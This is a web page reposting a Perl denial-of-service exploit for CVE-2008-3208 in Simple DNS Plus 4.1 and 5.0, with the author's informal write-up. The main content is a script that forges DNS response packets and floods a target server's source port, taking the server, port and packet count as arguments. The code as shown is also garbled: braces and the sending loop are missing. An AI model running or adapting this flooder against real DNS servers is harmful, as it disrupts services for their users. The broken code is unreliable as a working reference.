CVE-2008-3208 (Simple DNS Plus 5.0/4.1 remote Denial of Service exploit)


Simple DNS Plus 4.1, 5.0, and possibly other versions before 5.1.101 allows remote attackers to cause a denial of service via multiple DNS reply packets.

Here is the original exploit description by Exodus:
After reading the story about Dan kaminskys DNS cache posioning attack
and watching his ridiculous youtube cornflakes commercial
i decided to trace the source of this vulnerability.
so in order to understand how kaminsky attack is any diffrent from the traditional dns cache posioning
i started digging into some RFCs/documentations and playing with the protocol
to see if i can find some clues/logical faults.
yet i didnt find anything worthy and i wonder if kaminsky founding is just some algorithm of guessing a little bit faster the 16 bit transaction ID field

anyway while i was doing some tests on this Simple DNS server
i’ve found that if i repeatingly send DNS server response packets as if i was a root dns server
to the client port of the DNS server it will remotly cause a denial of service.

so what we have here is a DNS response packet built from scratch
that basicly flood the the source port of some “Simple DNS server Plus” and deny its service.
p.s: i used mutiple pack functions to make it more convenient
i could have just squeeze it into one pack but what the heck..


# Simple DNS Plus 5.0/4.1 < remote Denial of Service exploit
# usage: <dns server> <dns source port> <num of packets>
# Exploit written by Exodus.
use IO::Socket;
if(@ARGV < 3){
print(" <dns server> <dns source port> <num of packets>");
$sock = IO::Socket::INET->new(PeerAddr => "$ARGV[0]:$ARGV[1]", Proto => 'UDP') || die("Cant connect DNS server");
$address = $ARGV[0];
$trans = pack("H4","1337");
$flags = pack("B16","1000010110110000");
$question = pack("H4","0001");
$answerRR = pack("H4","0001");
$authorityRR = pack("H4","0000");
$additionlRR = pack("H4","0000");
$type = pack("H4","0001"); # A host name
$class = pack("H4","0001"); # IN
@parts = split(/\./,$address);
foreach $part (@parts)
 $packedlen = pack("H2",sprintf("%02x",length($part)));
 $address2 .= $packedlen.$part;
$query = $address2. "\000" . $type . $class;
$aname = pack("H4","c00c");
$atype = pack("H4","0001");
$aclass = pack("H4","0001");
$ttl = pack("H8","0000008d");
$dlen = pack("H4","0004");
$addr = inet_aton("");
$answer = $aname . $atype . $aclass . $ttl . $dlen . $addr;
$payload = $trans . $flags . $question . $answerRR
. $authorityRR . $additionlRR . $query . $answer;
print "sending $ARGV[2] packets… ";
 print $sock $payload;
print "Done. Good bye.";

Skip to content